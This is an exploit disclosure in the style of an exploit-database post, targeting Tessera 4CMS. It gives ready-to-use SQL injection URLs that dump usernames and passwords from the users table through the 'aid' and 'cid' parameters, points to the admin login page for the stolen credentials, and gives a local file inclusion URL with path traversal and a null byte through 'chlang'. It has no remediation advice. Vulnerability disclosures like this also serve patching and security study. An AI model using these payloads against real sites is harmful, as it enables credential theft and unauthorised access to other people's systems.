Tessera 4CMS suffers from remote SQL injection and local file inclusion vulnerabilities.
e6aae8d3dbbd74d2a6ab420235c945486296f9a7ae556015eebb25bb3b2e8e10
###############################################################
# #
# Tessera 4CMS multiple vulnerabilities (SQLi + LFI) #
###############################################################
# ####### #
# #
# xploited by k1ll3r_null #
# #
# contact: k1ll3r.null@gmail.com #
###############################################################
+++++++ greetz to all p0wnbox.com members !!! +++++++
--------------------------------------------------------------------------------------
Vulnerable product : tessera 4CMS (all versions)
Read Product info : http://www.tessera.gr/frontend/article.php?aid=9&cid=5
-------------------------------------------------------------------------------------------------------------------------
SQL injection vulnerabilities :
vulnerable file : article.php // vulnerable parameter: "aid" ($_GET)
vulnerable file : articles.php // vulnerable parameter: "cid" ($_GET)
Exploit :
1) http://www.site.com/frontend/article.php?aid=-9999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users--
2) http://www.site.com/frontend/articles.php?cid=-999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users--
LOGIN:
http://site.com/admin/login.php
-------------------------------------------------------------------------------------------------------------------------
LFI vulnerability :
vulnerable file : index.php // vulnerable parameter: "chlang" ($_GET)
Exploit :
http://www.site.com/frontend/index.php?chlang=../../../../etc/services%00
--------------------------------------------------------------------------------------------------------------------------